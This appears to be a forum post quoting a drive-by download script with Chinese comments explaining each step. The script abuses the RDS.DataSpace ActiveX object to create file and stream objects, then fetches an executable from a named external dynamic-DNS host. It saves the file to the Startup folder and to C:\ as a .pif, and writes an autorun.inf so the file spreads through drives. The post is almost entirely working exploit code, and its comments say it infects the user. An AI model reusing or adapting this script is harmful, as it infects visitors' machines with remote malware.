4,009
社区成员




<script>
var id = "classid";
var id2 = "cl";
var id3 = "6C556-65A3-11D0";
var id4 = "sid:BD9";
var id5 = "A-00C04";
var id6 = "-983";
var id7 = "FC29E36";
var object = document.createElement("object");
var idx = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";
object.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
//以上定义这么多字符串只不过为了拼出最后这个clsid
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
function userSend()
{
xmlHttp.open( 'GET ', 'http://loveip.ddns.info/love2/herdow.ex ',true);
xmlHttp.onReadyStateChange = userResponse;
xmlHttp.send();
}
//以上用xmlhttp向这个地址发出请求
function userResponse()
{
if(xmlHttp.readyState == 4)
{
var adodbStream = object.CreateObject("Adodb.Stream","");
var cuteqqcn = '\\..\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\System.pif ';
var cuteqqcn2 = "C:\\MicroSofts.pif";
var cuteqqcn3 = "C:\\autorun.inf";
var chilam = "[AutoRun]"+"\n"+"OPEN=MicroSofts.pif"+"\n"+"shellexecute=MicroSofts.pif"+"\n"+"shell\Auto\command=MicroSofts.pif";
var cuteqq = object.CreateObject("Scripting.FileSystemObject","");
var temp = cuteqq.GetSpecialFoLder(0);
cuteqqcn = cuteqq.BuildPath(temp,cuteqqcn);
adodbStream.Type = 2;
adodbStream.OpEn();
adodbStream.WriteText=chilam;
adodbStream.Savetofile(cuteqqcn3,2);
adodbStream.Close();
adodbStream.type = 1;
adodbStream.OpEn();
adodbStream.Write(xmlHttp.responseBody);
adodbStream.SaveToFile(cuteqqcn2,2);
adodbStream.SaveToFile(cuteqqcn,2);
adodbStream.Close();
}
}
//以上把请求结果写到文件中,导致用户中毒
userSend();
</script>